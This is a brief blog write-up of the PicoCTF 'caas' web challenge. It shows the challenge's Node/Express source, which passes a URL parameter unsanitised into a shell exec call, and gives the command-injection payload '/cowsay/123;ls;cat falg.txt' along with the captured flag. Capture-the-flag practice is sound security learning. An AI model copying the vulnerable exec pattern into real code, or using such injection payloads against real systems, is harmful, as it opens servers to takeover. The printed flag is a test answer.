PicoCTF - caas

Posted on 2023-06-20 | Post modified | In Security/Practice/PicoCTF/Web |

PicoCTF - caas

tags: `PicoCTF` `CTF` `Web`

Background

Command Injection

Source code

const express = require('express');
const app = express();
const { exec } = require('child_process');

app.use(express.static('public'));

app.get('/cowsay/:message', (req, res) => {
  exec(`/usr/games/cowsay ${req.params.message}`, {timeout: 5000}, (error, stdout) => {
    if (error) return res.status(500).end();
    res.type('txt').send(stdout).end();
  });
});

app.listen(3000, () => {
  console.log('listening');
});

Recon

直覺是command injection

Exploit - Easy Command Injection

Payload: /cowsay/123;ls;cat falg.txt Flag: picoCTF{moooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0o}

Reference

CaaS | Web Category | PicoCTF | CTF For beginners

Post author: SBK6401
Post link: https://bernie6401.github.io/security/practice/picoctf/web/2023/06/20/PicoCTF-caas/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.